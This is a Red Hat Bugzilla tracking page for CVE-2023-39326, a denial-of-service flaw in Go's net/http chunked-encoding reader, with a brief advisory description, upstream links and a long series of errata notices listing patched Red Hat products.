Note: This is a public test instance of Red Hat Bugzilla. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback at bugzilla.redhat.com.
Bug 2253330 (CVE-2023-39326) - CVE-2023-39326 golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests
Summary: CVE-2023-39326 golang: net/http/internal: Denial of Service (DoS) via Resourc...
Keywords:
Status: NEW
Alias: CVE-2023-39326
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Sayan Biswas
QA Contact:
URL:
Whiteboard:
Depends On: 2253338 2253339 2253340 2253341 2253342 2253343 2253344 2253345 2253346 2253348 2255162 2255163 2255535 2293410 2293411 2253332 2253333 2253335 2253336 2253337 2253347
Blocks:
TreeView+ depends on / blocked
 
Reported: 2023-12-06 20:47 UTC by Patrick Del Bello
Modified: 2024-06-17 07:00 UTC (History)
132 users (show)

Fixed In Version: golang 1.20.12, golang 1.21.0-0, golang 1.21.5
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHBA-2024:0931 0 None None None 2024-02-21 01:01:01 UTC
Red Hat Product Errata RHBA-2024:0932 0 None None None 2024-02-21 01:01:19 UTC
Red Hat Product Errata RHBA-2024:0933 0 None None None 2024-02-21 01:01:29 UTC
Red Hat Product Errata RHBA-2024:1009 0 None None None 2024-02-27 19:49:36 UTC
Red Hat Product Errata RHBA-2024:1010 0 None None None 2024-02-27 20:48:14 UTC
Red Hat Product Errata RHBA-2024:1011 0 None None None 2024-02-27 21:40:24 UTC
Red Hat Product Errata RHSA-2023:7198 0 None None None 2024-02-27 20:50:04 UTC
Red Hat Product Errata RHSA-2023:7200 0 None None None 2024-02-27 22:47:13 UTC
Red Hat Product Errata RHSA-2023:7201 0 None None None 2024-02-27 22:29:10 UTC
Red Hat Product Errata RHSA-2024:0269 0 None None None 2024-02-28 00:20:19 UTC
Red Hat Product Errata RHSA-2024:0281 0 None None None 2024-03-06 14:40:14 UTC
Red Hat Product Errata RHSA-2024:0530 0 None None None 2024-01-25 18:10:46 UTC
Red Hat Product Errata RHSA-2024:0694 0 None None None 2024-02-07 18:45:56 UTC
Red Hat Product Errata RHSA-2024:0695 0 None None None 2024-02-07 22:50:35 UTC
Red Hat Product Errata RHSA-2024:0728 0 None None None 2024-02-08 17:27:50 UTC
Red Hat Product Errata RHSA-2024:0748 0 None None None 2024-02-08 18:20:25 UTC
Red Hat Product Errata RHSA-2024:0843 0 None None None 2024-02-15 12:55:40 UTC
Red Hat Product Errata RHSA-2024:0880 0 None None None 2024-02-20 11:03:50 UTC
Red Hat Product Errata RHSA-2024:0887 0 None None None 2024-02-20 12:30:15 UTC
Red Hat Product Errata RHSA-2024:1041 0 None None None 2024-02-29 09:04:04 UTC
Red Hat Product Errata RHSA-2024:1078 0 None None None 2024-03-05 00:34:26 UTC
Red Hat Product Errata RHSA-2024:1131 0 None None None 2024-03-05 18:11:24 UTC
Red Hat Product Errata RHSA-2024:1149 0 None None None 2024-03-05 18:13:09 UTC
Red Hat Product Errata RHSA-2024:1244 0 None None None 2024-03-11 16:04:26 UTC
Red Hat Product Errata RHSA-2024:1434 0 None None None 2024-03-20 07:40:31 UTC
Red Hat Product Errata RHSA-2024:1640 0 None None None 2024-04-02 19:30:18 UTC
Red Hat Product Errata RHSA-2024:1812 0 None None None 2024-04-15 05:44:53 UTC
Red Hat Product Errata RHSA-2024:1859 0 None None None 2024-04-16 17:26:20 UTC
Red Hat Product Errata RHSA-2024:1896 0 None None None 2024-04-25 15:14:56 UTC
Red Hat Product Errata RHSA-2024:1901 0 None None None 2024-04-18 07:18:46 UTC
Red Hat Product Errata RHSA-2024:2160 0 None None None 2024-04-30 09:41:29 UTC
Red Hat Product Errata RHSA-2024:2193 0 None None None 2024-04-30 09:46:54 UTC
Red Hat Product Errata RHSA-2024:2245 0 None None None 2024-04-30 09:55:42 UTC
Red Hat Product Errata RHSA-2024:2272 0 None None None 2024-04-30 09:58:55 UTC

Description Patrick Del Bello 2023-12-06 20:47:22 UTC
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.

https://go.dev/cl/547335
https://go.dev/issue/64433
https://groups.google.com/g/golang-dev/c/6ypN5EjibjM/m/KmLVYH_uAgAJ
https://pkg.go.dev/vuln/GO-2023-2382

Comment 1 Patrick Del Bello 2023-12-06 20:51:59 UTC
Created golang tracking bugs for this issue:

Affects: epel-all [bug 2253332]
Affects: fedora-all [bug 2253333]

Comment 9 Debarshi Ray 2024-01-15 22:46:54 UTC
We are missing the RHEL 9 tracking bug for toolbox, even though the bugs for RHEL 8 are there.

Comment 16 errata-xmlrpc 2024-01-25 18:10:38 UTC
This issue has been addressed in the following products:

  Cryostat 2 on RHEL 8

Via RHSA-2024:0530 https://access.redhat.com/errata/RHSA-2024:0530

Comment 20 errata-xmlrpc 2024-02-07 18:45:49 UTC
This issue has been addressed in the following products:

  RHOL-5.7-RHEL-8

Via RHSA-2024:0694 https://access.redhat.com/errata/RHSA-2024:0694

Comment 21 errata-xmlrpc 2024-02-07 22:50:27 UTC
This issue has been addressed in the following products:

  RHOL-5.6-RHEL-8

Via RHSA-2024:0695 https://access.redhat.com/errata/RHSA-2024:0695

Comment 22 errata-xmlrpc 2024-02-08 17:27:42 UTC
This issue has been addressed in the following products:

  RHOL-5.8-RHEL-9

Via RHSA-2024:0728 https://access.redhat.com/errata/RHSA-2024:0728

Comment 23 errata-xmlrpc 2024-02-08 18:20:18 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2024:0748 https://access.redhat.com/errata/RHSA-2024:0748

Comment 24 errata-xmlrpc 2024-02-15 12:55:33 UTC
This issue has been addressed in the following products:

  RHOSS-1.31-RHEL-8

Via RHSA-2024:0843 https://access.redhat.com/errata/RHSA-2024:0843

Comment 25 errata-xmlrpc 2024-02-20 11:03:42 UTC
This issue has been addressed in the following products:

  Openshift Serverless 1 on RHEL 8

Via RHSA-2024:0880 https://access.redhat.com/errata/RHSA-2024:0880

Comment 26 errata-xmlrpc 2024-02-20 12:30:07 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2024:0887 https://access.redhat.com/errata/RHSA-2024:0887

Comment 27 errata-xmlrpc 2024-02-27 20:49:56 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.15

Via RHSA-2023:7198 https://access.redhat.com/errata/RHSA-2023:7198

Comment 28 errata-xmlrpc 2024-02-27 22:29:02 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.15

Via RHSA-2023:7201 https://access.redhat.com/errata/RHSA-2023:7201

Comment 29 errata-xmlrpc 2024-02-27 22:47:06 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.15

Via RHSA-2023:7200 https://access.redhat.com/errata/RHSA-2023:7200

Comment 30 errata-xmlrpc 2024-02-28 00:20:13 UTC
This issue has been addressed in the following products:

  RODOO-1.1-RHEL-9

Via RHSA-2024:0269 https://access.redhat.com/errata/RHSA-2024:0269

Comment 32 errata-xmlrpc 2024-02-29 09:03:57 UTC
This issue has been addressed in the following products:

  Red Hat Developer Tools

Via RHSA-2024:1041 https://access.redhat.com/errata/RHSA-2024:1041

Comment 33 errata-xmlrpc 2024-03-05 00:34:19 UTC
This issue has been addressed in the following products:

  STF-1.5-RHEL-8

Via RHSA-2024:1078 https://access.redhat.com/errata/RHSA-2024:1078

Comment 34 errata-xmlrpc 2024-03-05 18:11:16 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:1131 https://access.redhat.com/errata/RHSA-2024:1131

Comment 35 errata-xmlrpc 2024-03-05 18:13:03 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:1149 https://access.redhat.com/errata/RHSA-2024:1149

Comment 36 errata-xmlrpc 2024-03-06 14:40:04 UTC
This issue has been addressed in the following products:

  OSSO-1.2-RHEL-9

Via RHSA-2024:0281 https://access.redhat.com/errata/RHSA-2024:0281

Comment 37 errata-xmlrpc 2024-03-11 16:04:19 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2024:1244 https://access.redhat.com/errata/RHSA-2024:1244

Comment 39 errata-xmlrpc 2024-03-20 07:40:24 UTC
This issue has been addressed in the following products:

  Red Hat Openshift distributed tracing 3.1

Via RHSA-2024:1434 https://access.redhat.com/errata/RHSA-2024:1434

Comment 40 errata-xmlrpc 2024-04-02 19:30:09 UTC
This issue has been addressed in the following products:

  Red Hat Ansible Automation Platform 2.4 for RHEL 9
  Red Hat Ansible Automation Platform 2.4 for RHEL 8

Via RHSA-2024:1640 https://access.redhat.com/errata/RHSA-2024:1640

Comment 41 errata-xmlrpc 2024-04-15 05:44:43 UTC
This issue has been addressed in the following products:

  OpenShift Custom Metrics Autoscaler 2

Via RHSA-2024:1812 https://access.redhat.com/errata/RHSA-2024:1812

Comment 42 errata-xmlrpc 2024-04-16 17:26:12 UTC
This issue has been addressed in the following products:

  OADP-1.3-RHEL-9

Via RHSA-2024:1859 https://access.redhat.com/errata/RHSA-2024:1859

Comment 43 errata-xmlrpc 2024-04-18 07:18:39 UTC
This issue has been addressed in the following products:

  Service Interconnect 1 for RHEL 9

Via RHSA-2024:1901 https://access.redhat.com/errata/RHSA-2024:1901

Comment 44 errata-xmlrpc 2024-04-25 15:14:47 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.12

Via RHSA-2024:1896 https://access.redhat.com/errata/RHSA-2024:1896

Comment 45 errata-xmlrpc 2024-04-30 09:41:21 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2160 https://access.redhat.com/errata/RHSA-2024:2160

Comment 46 errata-xmlrpc 2024-04-30 09:46:47 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2193 https://access.redhat.com/errata/RHSA-2024:2193

Comment 47 errata-xmlrpc 2024-04-30 09:55:34 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2245 https://access.redhat.com/errata/RHSA-2024:2245

Comment 48 errata-xmlrpc 2024-04-30 09:58:45 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2272 https://access.redhat.com/errata/RHSA-2024:2272


Note You need to log in before you can comment on or make changes to this bug.